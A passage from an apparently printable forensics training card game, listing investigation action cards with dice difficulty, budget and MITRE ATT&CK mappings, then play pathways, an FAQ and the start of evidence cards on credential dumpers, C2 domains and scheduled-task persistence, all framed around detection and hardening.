║ +1 if Analyze Evidence action previously discovered malware ║
║ -2 if memory was overwritten before capture (time-sensitive) ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Time-critical: Memory is lost if system is rebooted ║
║ • Reveals active threats that may not exist on disk ║
║ • Combines process discovery with malware analysis ║
║ • Most valuable for finding active C2 connections ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ MEM-02: MEMORY FORENSICS DEEP DIVE ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Advanced Volatile Memory Analysis ║
║ MITRE ATT&CK: T1112 (Modify Registry), T1055 (Process ║
║ Injection), T1140 (Deobfuscate/Decode Files) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 15 ║
║ Budget Cost: 20 ║
║ Duration: 3 turns (expert-level analysis) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Expert-level memory analysis including malware behavior ║
║ simulation, deobfuscation of shellcode, reverse engineering ║
║ of code injected into memory, and recovery of encryption keys. ║
║ Requires deep expertise in assembly language, malware tactics, ║
║ and memory layouts. ║
║ ║
║ What You're Looking For: ║
║ - Obfuscated/encrypted malware payloads (deobfuscate them) ║
║ - Code injection techniques (understand HOW malware hides) ║
║ - Encryption keys and passphrases in memory (crypto recovery) ║
║ - Malware command history (recent attacker commands) ║
║ - Process hollowing or code caves (anti-analysis techniques) ║
║ - Privilege escalation vulnerabilities in use ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 15): ║
║ Discover TWO Evidence cards: One from malware behavior set ║
║ (e.g., Encryption Keys, Command History) + one from attack ║
║ technique set (e.g., Code Injection Method, Exploitation Used).║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +25%, Attribution +20% ║
║ ║
║ PARTIAL SUCCESS (roll 13-14): ║
║ Discover ONE complete Evidence + incomplete second evidence. ║
║ Advance: Attack Chain +15%, Attribution +10% ║
║ ║
║ FAILURE (roll < 13): ║
║ Malware uses sophisticated anti-analysis; analysis fails. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Analysis documentation critical (how did you reach conclusions)║
║ Chain of Custody: Strong if reverse engineering is documented. ║
║ ⚠ Conclusions must be explained clearly for court admissibility║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +3 if investigator has GCFA (Certified Forensic Analyst) ║
║ +2 if malware reverse engineering background ║
║ +1 if Malware Analysis card already completed ║
║ +1 if detailed explanation of deobfuscation approach ║
║ -2 if malware is heavily obfuscated or virtualized ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Most expensive memory analysis (20 budget) ║
║ • Requires reverse engineering expertise ║
║ • Discovers "why" the malware works, not just "what" ║
║ • Essential for understanding sophisticated attacks ║
║ • Can take weeks in real investigations; represented as 3 turns║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ LOG-01: EVENT LOG ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Windows/Linux Log Examination ║
║ MITRE ATT&CK: T1552 (Unsecured Credentials), T1098 (Account ║
║ Manipulation) ║
║ T1021 (Remote Services), T1078 (Valid Accounts) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 11 ║
║ Budget Cost: 5 ║
║ Duration: 1 turn ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Analyze system event logs (Windows Event Log, syslog, etc.) ║
║ to identify user logins, privilege escalations, file access, ║
║ and process execution. This is foundational and relatively ║
║ quick—useful for establishing a basic timeline. ║
║ ║
║ What You're Looking For: ║
║ - Failed login attempts (brute force evidence) ║
║ - Successful logins from unusual locations/times ║
║ - Privilege escalation attempts (RunAs, sudo) ║
║ - Process creation events ║
║ - Service installation events ║
║ - File access to sensitive files ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 11): ║
║ Discover ONE Evidence card from: Suspicious Login Timeline, ║
║ Privilege Escalation Attempt, or Service Installation evidence.║
║ Advance (only if no Evidence card produced): ║
║ Timeline Completeness +15%, Attack Chain +10% ║
║ ║
║ PARTIAL SUCCESS (roll 9-10): ║
║ Discover partial timeline (logs are fragmented or unclear). ║
║ Advance: Timeline Completeness +5%, Attack Chain +5% ║
║ ║
║ FAILURE (roll < 9): ║
║ Logs were deleted or corrupted; no useful evidence. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Logs must be exported with metadata (timestamps, user context).║
║ Chain of Custody: Strong if logs are digitally signed. ║
║ ✓ Admissible in court (widely accepted evidence type) ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +1 if investigator has Windows administration experience ║
║ +1 if investigator has SIEM/log analysis background ║
║ +1 if detailed explanation of log analysis approach ║
║ +2 if prior Timeline Reconstruction investigation completed ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Cheapest investigation (5 budget) - good starting point ║
║ • Fastest (1 turn) - can be done early in investigation ║
║ • Foundation for Timeline Reconstruction and Log Correlation ║
║ • May be ineffective if attacker deleted logs (add anti-forensics penalty: +2 DC) ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ LOG-02: DEEP LOG CORRELATION ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Cross-System Log Analysis & Correlation ║
║ MITRE ATT&CK: T1087 (Account Discovery), T1021 (Remote Services)║
║ T1083 (File and Directory Discovery) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13 ║
║ Budget Cost: 10 ║
║ Duration: 2 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Correlate logs from multiple systems (servers, firewalls, IDS, ║
║ proxies, domain controllers) to build a complete timeline of ║
║ attacker lateral movement and actions across the environment. ║
║ Requires SIEM expertise or manual correlation tools. ║
║ ║
║ What You're Looking For: ║
║ - Lateral movement pattern (login on A → login on B → etc) ║
║ - Privilege escalation sequence (user to admin to system) ║
║ - Command execution across systems ║
║ - Network connections (firewall → host activity) ║
║ - Timeline of data access and exfiltration ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13): ║
║ Discover ONE Evidence card from: Lateral Movement Pattern, ║
║ Complete Attack Timeline, or Attacker Command Sequence. ║
║ Advance (only if no Evidence card produced): ║
║ Timeline Completeness +20%, Attack Chain +25% ║
║ ║
║ PARTIAL SUCCESS (roll 11-12): ║
║ Discover partial timeline (some systems missing logs). ║
║ Advance: Timeline Completeness +15%, Attack Chain +10% ║
║ ║
║ FAILURE (roll < 11): ║
║ Too many log gaps; timeline cannot be reliably correlated. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Correlation requires clear documentation of methodology. ║
║ Chain of Custody: Strong if SIEM tool provided audit trail. ║
║ ✓ Admissible if correlation process is documented clearly ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has SIEM administration (Splunk, ArcSight) ║
║ +1 if LOG-01 already completed (building on prior analysis) ║
║ +1 if detailed explanation of correlation methodology ║
║ +2 if team provides narrative of suspected attacker movements ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Most valuable for understanding "how" attacker moved ║
║ • Reveals attack pace and duration (dwell time) ║
║ • Can expose failed lateral movement attempts ║
║ • Requires multiple systems to have logging enabled ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ NET-01: NETWORK TRAFFIC ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Packet Capture & Flow Analysis ║
║ MITRE ATT&CK: T1041 (Exfiltration Over C2), T1048 (Alternative ║
║ Protocol), T1071 (Application Layer Protocol) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12 ║
║ Budget Cost: 10 ║
║ Duration: 2 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Analyze network traffic captures (PCAP) or network flow records║
║ (NetFlow) to identify communication patterns, exfiltration ║
║ evidence, and command-and-control connections. Uses tools like ║
║ Wireshark, Zeek, or commercial traffic analysis platforms. ║
║ ║
║ What You're Looking For: ║
║ - Unusual outbound connections (C2 domains, IPs) ║
║ - Large data transfers (exfiltration evidence) ║
║ - Encrypted tunnels (VPN, proxy connections) ║
║ - DNS queries for suspicious domains ║
║ - HTTP user agents inconsistent with legitimate software ║
║ - Beacon-like patterns (regular connection attempts) ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12): ║
║ Discover ONE Evidence card from: C2 Server Evidence, ║
║ Exfiltration Traffic Pattern, or Suspicious Domain Lookup. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +20%, Attribution +15% ║
║ ║
║ PARTIAL SUCCESS (roll 10-11): ║
║ Discover suspicious traffic but destination unclear. ║
║ Advance: Attack Chain +10%, Attribution +5% ║
║ ║
║ FAILURE (roll < 10): ║
║ Traffic too encrypted or obfuscated; cannot analyze. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ PCAP files must include timestamp and collection metadata. ║
║ Chain of Custody: Strong if collected from router/IDS. ║
║ ✓ Admissible (widely accepted for network evidence) ║
║ ⚠ Encrypted traffic reveals patterns but not content ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has Wireshark/packet analysis certification ║
║ +1 if network engineering background ║
║ +1 if Threat Attribution evidence already discovered ║
║ -1 if traffic is heavily encrypted or anonymized ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Reveals attacker communication patterns ║
║ • Can identify C2 infrastructure ║
║ • Exfiltration volume is critical evidence ║
║ • Encrypted traffic is harder to analyze but patterns visible ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ NET-02: PACKET CAPTURE DEEP ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Advanced Protocol Forensics & Reconstruction ║
║ MITRE ATT&CK: T1557 (Adversary-in-the-Middle), T1040 (Network ║
║ Sniffing), T1071 (Application Layer Protocol) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14 ║
║ Budget Cost: 15 ║
║ Duration: 3 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Deep packet inspection including protocol reconstruction ║
║ (rebuilding HTTP streams, email messages, file transfers from ║
║ packet payloads), malware traffic analysis, and detection of ║
║ exploitation attempts in traffic. Requires advanced networking ║
║ and protocol knowledge. ║
║ ║
║ What You're Looking For: ║
║ - Reconstructed HTTP/S traffic (actual data transferred) ║
║ - Exploitation payloads in network traffic (shellcode, etc) ║
║ - Malware command protocols (custom C2 protocols) ║
║ - Authentication attempts (credentials in transit) ║
║ - Man-in-the-middle evidence (SSL/TLS downgrade, cert mismatches)║
║ - Attacker reconnaissance traffic patterns ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14): ║
║ Discover TWO Evidence cards from: Exploitation Traffic, ║
║ C2 Protocol Details, or Attacker Reconnaissance Pattern. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +25%, Attribution +25% ║
║ ║
║ PARTIAL SUCCESS (roll 12-13): ║
║ Discover ONE complete evidence + incomplete second. ║
║ Advance: Attack Chain +15%, Attribution +10% ║
║ ║
║ FAILURE (roll < 12): ║
║ Encryption or obfuscation prevents useful reconstruction. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ PCAP reconstruction must document decoding methodology. ║
║ Chain of Custody: Moderate (depends on decoding assumptions). ║
║ ⚠ If encrypted traffic decoded, must explain decryption method║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has network forensics certification ║
║ +2 if protocol reverse engineering experience ║
║ +1 if NET-01 already completed (building on analysis) ║
║ -2 if traffic is encrypted and keys not recovered ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Most detailed network analysis (3 turns) ║
║ • Requires protocol expertise (HTTP, DNS, custom protocols) ║
║ • Reveals actual attacker commands and data stolen ║
║ • Challenging when traffic is encrypted ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ MALW-01: MALWARE ANALYSIS (DYNAMIC) ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Behavioral Malware Analysis ║
║ MITRE ATT&CK: T1518 (Software Discovery), T1082 (System Info), ║
║ T1012 (Query Registry), T1033 (System Owner/User) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12 ║
║ Budget Cost: 15 ║
║ Duration: 2 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Execute malware samples in an isolated sandbox environment ║
║ and record their behavior. Monitor file system changes, registry║
║ modifications, network connections, and process creation to ║
║ understand what the malware does without reverse engineering. ║
║ Uses tools like Cuckoo, Any.run, or commercial sandboxes. ║
║ ║
║ What You're Looking For: ║
║ - File system changes (what files created/modified) ║
║ - Registry modifications (persistence mechanisms) ║
║ - Network communications (DNS, HTTP, etc connections) ║
║ - Process creation (child processes, injections) ║
║ - System enumeration (reconnaissance activity) ║
║ - Anti-analysis techniques (checks for sandbox) ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12): ║
║ Discover ONE Evidence card from: Malware Behavior Profile, ║
║ Persistence Mechanism Created, or C2 Callback Observed. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +20%, Attribution +10% ║
║ ║
║ PARTIAL SUCCESS (roll 10-11): ║
║ Malware behavior observed but some details unclear. ║
║ Advance: Attack Chain +10%, Attribution +5% ║
║ ║
║ FAILURE (roll < 10): ║
║ Malware detects sandbox; exhibits anti-analysis behavior. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Sandbox execution creates video/log recordings of behavior. ║
║ Chain of Custody: Strong if sandbox logs are preserved. ║
║ ✓ Admissible (widely accepted malware analysis evidence) ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has GREM (GIAC Reverse Engineering Malware) ║
║ +1 if incident responder with malware analysis training ║
║ +1 if detailed explanation of behavioral analysis approach ║
║ -1 if malware implements anti-sandbox techniques ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Safer than static analysis (execution is isolated) ║
║ • Reveals "what the malware does" not "how it works" ║
║ • Complements Static Analysis (MALW-02) well ║
║ • Useful for identifying persistence and C2 behavior ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ MALW-02: MALWARE ANALYSIS (STATIC) ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Code Reverse Engineering & Analysis ║
║ MITRE ATT&CK: T1140 (Deobfuscate/Decode Files), T1027 ║
║ (Obfuscated Files or Information), T1071 ║
║ (Application Layer Protocol) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14 ║
║ Budget Cost: 10 ║
║ Duration: 2 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Disassemble and analyze malware code without execution using ║
║ reverse engineering tools (IDA Pro, Ghidra, Binary Ninja, etc).║
║ Examine assembly code, strings, imports, and code structure to ║
║ understand attacker capabilities and techniques. Requires ║
║ assembly language and debugging expertise. ║
║ ║
║ What You're Looking For: ║
║ - Hardcoded C2 servers, encryption keys ║
║ - Malware capabilities (spyware, RAT, backdoor, etc) ║
║ - Obfuscation techniques (packing, encryption, polymorphism) ║
║ - Code similarities to known malware families ║
║ - Exploit codes (zero-days, known CVEs) ║
║ - Attacker identity clues (developer name, code style) ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14): ║
║ Discover ONE Evidence card from: Malware Source Code Analysis, ║
║ Hardcoded C2 Server, or Code Similarity to Known Family. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +20%, Attribution +25% ║
║ ║
║ PARTIAL SUCCESS (roll 12-13): ║
║ Understand some code features but full analysis incomplete. ║
║ Advance: Attack Chain +10%, Attribution +10% ║
║ ║
║ FAILURE (roll < 12): ║
║ Malware is heavily obfuscated; code analysis inconclusive. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Reverse engineering analysis is documented with screenshots ║
║ Chain of Custody: Moderate (interpretation-dependent). ║
║ ⚠ Conclusions must be clearly explained for admissibility ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +3 if investigator has GREM (GIAC Reverse Engineering Malware) ║
║ +2 if assembly language and debugging expertise ║
║ +1 if MALW-01 already completed (building on behavioral findings)║
║ +1 if detailed explanation of reverse engineering approach ║
║ -2 if malware is polymorphic/heavily obfuscated ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Highest skill requirement (DC 14) ║
║ • Reveals "how the malware works" ║
║ • Can identify code reuse and attacker patterns ║
║ • Complements Behavior Analysis (MALW-01) well ║
║ • Time-consuming (2 turns represents weeks of analysis) ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ TIMELINE-01: TIMELINE RECONSTRUCTION ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Event Correlation & Chronological Analysis ║
║ MITRE ATT&CK: T1074 (Data Staged), T1087 (Account Discovery), ║
║ T1046 (Network Service Discovery) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13 ║
║ Budget Cost: 5 ║
║ Duration: 1 turn ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Synthesize evidence from multiple sources (logs, timestamps, ║
║ file metadata, malware analysis) into a unified chronological ║
║ timeline of the attack. Identify sequence of events, dwell ║
║ time, and decision points. ║
║ ║
║ What You're Looking For: ║
║ - Entry point and initial compromise time ║
║ - Privilege escalation points and timing ║
║ - Lateral movement sequence ║
║ - Data reconnaissance timeline ║
║ - Exfiltration timing (when, how much, for how long) ║
║ - Dwell time (how long attacker in network before detection) ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13): ║
║ Discover ONE Evidence card: Complete Attack Timeline with ║
║ key decision points and transitions between phases identified. ║
║ Advance (only if no Evidence card produced): ║
║ Timeline Completeness +25%, Attack Chain +15% ║
║ ║
║ PARTIAL SUCCESS (roll 11-12): ║
║ Partial timeline with some events missing or unclear. ║
║ Advance: Timeline Completeness +15%, Attack Chain +10% ║
║ ║
║ FAILURE (roll < 11): ║
║ Too many timestamp discrepancies; timeline unreliable. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Timeline must reference source evidence for each event. ║
║ Chain of Custody: Strong if well-documented and cross-referenced║
║ ✓ Admissible if timeline sources are cited ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator is DFIR (Digital Forensics & Incident Response)║
║ +1 if LOG-01 or LOG-02 already completed ║
║ +2 if detailed explanation synthesizes multiple evidence sources║
║ +1 if team notes discrepancies and explains them ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Critical for understanding attack progression ║
║ • Cheap (5 budget) but requires multiple prior investigations ║
║ • Fast (1 turn) but depends on prior evidence collection ║
║ • Foundation for narrative reconstruction of incident ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ THREAT-01: THREAT ATTRIBUTION ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Threat Intelligence & Attribution ║
║ MITRE ATT&CK: G#### group / S#### software identification ║
║ Requires synthesis of all prior evidence ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 15 ║
║ Budget Cost: 20 ║
║ Duration: 3 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Synthesize all collected evidence (malware, infrastructure, ║
║ tactics, timeline, timeline) to attribute the attack to a ║
║ known threat group, nation-state, or attacker profile. Includes║
║ cross-referencing with threat intelligence databases, academic ║
║ papers, and law enforcement data. This is the highest-level ║
║ attribution analysis. ║
║ ║
║ What You're Looking For: ║
║ - Similar attacks in CTI databases (VirusTotal, OSINT, etc) ║
║ - Malware signatures matching known threat groups ║
║ - Tactics & Techniques (TTPs) matching known profiles ║
║ - Infrastructure (domains, IPs) linked to known campaigns ║
║ - Language/coding style hints about attacker origin ║
║ - Geolocation clues from timestamps and infrastructure ║
║ - Victim profile matching known group targeting patterns ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 15): ║
║ Discover ONE Evidence card: Threat Attribution Report with ║
║ confidence level (60-90%) linking to specific threat group. ║
║ Advance (only if no Evidence card produced): ║
║ Attribution Confidence +35%, Attack Chain +10% ║
║ ║
║ PARTIAL SUCCESS (roll 13-14): ║
║ Partial attribution (likely group/profile but not 100% certain)║
║ Advance: Attribution Confidence +25%, Attack Chain +5% ║
║ ║
║ FAILURE (roll < 13): ║
║ Insufficient evidence for reliable attribution. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Attribution must cite specific evidence for each finding. ║
║ Chain of Custody: Moderate (depends on CTI source reliability) ║
║ ⚠ Confidence level must be documented (70% vs. 90% certainty) ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has threat intelligence background ║
║ +1 if access to premium CTI services (CrowdStrike, Mandiant) ║
║ +1 per prior investigation showing strong evidence patterns ║
║ +2 if detailed narrative synthesizes multiple evidence sources ║
║ -2 if evidence is sparse or conflicting ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Highest difficulty (DC 15) requires extensive prior evidence ║
║ • Cannot be done until sufficient evidence collected ║
║ • Most valuable action for reaching Victory Condition 1 ║
║ • Attribution confidence matters: 60% vs. 95% is significant ║
║ • Final step in forensic investigation ║
╚════════════════════════════════════════════════════════════════╝
Materials Needed: - Cardstock (250 gsm minimum) - Card sleeves (optional but recommended) - Scissors or guillotine cutter - Ruler and cutting mat
Printing Instructions: 1. Print each card on heavy cardstock (250 gsm) 2. Cut along the border (approx. 3.5" x 5.5" for standard card size) 3. Optional: Laminate for durability 4. Optional: Sleeve cards for shuffling and handling
PDF Layout: [Card layout with 4-6 cards per page will be generated separately in printable PDF format]
Pathway 1: Quick Start (Turns 1-3) - LOG-01 (Event Log Analysis) → Timeline Reconstruction → Identify key events
Pathway 2: Deep Evidence (Turns 1-5) - DISK-01 (Disk Image) → MALW-01 (Dynamic Analysis) → MALW-02 (Static Analysis) → Understand full malware
Pathway 3: Network-Based (Turns 1-5) - LOG-01 (Initial timeline) → NET-01 (Network Traffic) → NET-02 (Deep Packet Analysis) → Reconstruct C2
Pathway 4: Attribution (Turns 1-6) - MALW-01/02 → NET-01 → THREAT-01 → Complete attribution with infrastructure evidence
Q: Can I do these investigations in any order? A: Yes, but some combinations are more efficient. Multiple investigations often support each other.
Q: What's the DC difficulty based on? A: Skill required. Easier investigations (LOG-01, TIMELINE-01) have DC 11-13. Complex investigations (MEM-02, THREAT-01) have DC 14-15.
Q: Why do some investigations take 3 turns? A: They represent weeks of real forensic work compressed into game turns. Mechanically (v2.2): pay the cost and use your action on the turn you start; the roll and results arrive at the start of the turn the Duration completes. Only one multi-turn investigation may be in flight at a time.
Q: What modifiers apply to my roll? A: Skill (+1 to +3), narrative explanation (+1 to +2), prior investigations (+1), challenge circumstances (-1 to -2).
cards/forensics/core-deck/evidence-cards.md
Version: 2.2 - Playtest Edition Card Count: 12 Evidence Cards + 4 Findings Cards = 16 Total Printable: Yes
Evidence Cards represent specific findings discovered during forensic investigations. They document what was found, how it was found, and what investigative leads it provides.
Findings Cards represent conclusions drawn from the evidence—these feed recommendations into Hardening, Network Building, and Audit modules.
Chain of Custody rule (v2.2): +5% Chain of Custody every time an Evidence card is discovered AND the team states how it was preserved (hash, imaging, log export); the TO may award +10% for exemplary handling. This stacks with any Chain of Custody impact printed on the card.
No Double Counting (v2.2): When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed "Impact on Progress Meters" (plus the Chain of Custody handling bonus above). The investigation card's own advance line applies only when no Evidence card is produced (e.g., partial success).
Each Evidence Card includes: - Card ID: Unique identifier (EVD-01 through EVD-12) - Type: Category of evidence (Malware, Credentials, Movement, Exfiltration, Infrastructure, Timeline) - Title: Specific finding name - MITRE ATT&CK: Technique this evidence relates to - Description: What was found and where - Discovery Source: Which Investigation Action cards typically find this evidence - Chain of Custody: Admissibility rating (Strong/Moderate/Weak) - Investigative Lead: What the team can do next with this finding - Connection to Attack: Links to threat cards and attack phases
╔════════════════════════════════════════════════════════════════╗
║ EVD-01: CREDENTIAL DUMPER MALWARE ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence ║
║ MITRE ATT&CK: T1003 (OS Credential Dumping), T1556 (Modify Auth)║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Malware sample recovered from compromised system that dumps ║
║ user credentials (SAM file, LSASS process, password hashes, ║
║ or Kerberos tickets). Examples: Mimikatz, PwDump, LaZagne. ║
║ ║
║ Where It Was Found: ║
║ - In System32 directory (hidden with attributes) ║
║ - In %Temp% directory (temporary staging) ║
║ - In admin user AppData (stealth installation) ║
║ ║
║ What It Reveals: ║
║ - Attacker objective: Privilege escalation ║
║ - Persistence vector: Credential harvesting ║
║ - Attack phase: Privilege escalation → lateral movement ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Binary file can be hashed (MD5, SHA-1, SHA-256) ║
║ - File timestamps document creation/modification ║
║ - Admissible in court with hash validation ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - DISK-01/DISK-02: Found as file artifact ║
║ - MEM-01/MEM-02: Found as running process in memory ║
║ - MALW-01: Behavior shows credential dumping actions ║
║ - MALW-02: Code analysis identifies dumping capabilities ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We found a credential dumper. Let's analyze its behavior ║
║ (MALW-01) to understand exactly what credentials were captured.║
║ Then we can assume those accounts are compromised." ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +15% (shows escalation phase) ║
║ - Attribution: +10% (dumper choice shows attacker sophistication)║
║ - Timeline: +10% (timestamp shows when escalation occurred) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Implement credential guard to prevent dumping" ║
║ → NETWORK BUILDING: "Isolate admin credentials in PAW" ║
║ → AUDIT: "Verify controls around credential access logging" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-02: C2 CALLBACK DOMAIN ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Infrastructure ║
║ MITRE ATT&CK: T1071 (Application Layer Protocol), T1573 (Encrypted║
║ Channel), T1008 (Fallback Channels) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Domain name or IP address that malware communicates with for ║
║ command and control. Examples: ║
║ - checkupdate.ru (looks legitimate but is attacker-controlled) ║
║ - 192.0.2.45 (direct IP address) ║
║ ║
║ Where It Was Found: ║
║ - In malware strings (hardcoded in binary) ║
║ - In network traffic (outbound connections) ║
║ - In memory (communication buffers) ║
║ - In DNS logs (DNS queries) ║
║ ║
║ What It Reveals: ║
║ - Attacker still has access (if domain still active) ║
║ - C2 infrastructure operator (may be reused for other campaigns)║
║ - Attack sophistication (legitimate-looking domain = higher skill║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Network logs document domain/IP communication ║
║ - PCAP files timestamp the traffic ║
║ - DNS logs show query history ║
║ - Admissible with supporting traffic analysis ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - MALW-01: Dynamic analysis shows C2 connections ║
║ - MALW-02: Static analysis finds hardcoded domains ║
║ - NET-01: Network traffic analysis identifies unusual domains ║
║ - NET-02: Deep packet inspection reconstructs C2 commands ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We found the C2 domain. Let's do THREAT-01 analysis to: ║
║ - WHOIS lookup (registrant info) ║
║ - Historical DNS records (see past resolutions) ║
║ - Infrastructure mapping (what else is hosted on this IP?) ║
║ - Passive DNS (VirusTotal, Shodan, etc)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +15% (confirms persistence vector) ║
║ - Attribution: +25% (infrastructure links to threat group) ║
║ - Timeline: +5% (timestamps when C2 was active) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Block C2 domain via firewall, DNS sinkhole" ║
║ → NETWORK BUILDING: "Implement egress filtering to C2 ranges" ║
║ → AUDIT: "Review firewall rules for C2 domain blocking" ║
║ ║
║ THREAT INTEL: ║
║ Can be shared with ISP/CISA for coordinated takedown/blocking. ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-03: PERSISTENCE MECHANISM (SCHEDULED TASK) ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence ║
║ MITRE ATT&CK: T1053 (Scheduled Task/Job), T1543 (Create/Modify ║
║ System Process) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Scheduled task or cron job configured to execute malware at ║
║ regular intervals (hourly, daily, on system startup). Ensures ║
║ malware runs even if process is killed or system reboots. ║
║ ║
║ Example: ║
║ - Task: "Windows_Update_Service" (disguised name) ║
║ - Runs: System startup + every 4 hours ║
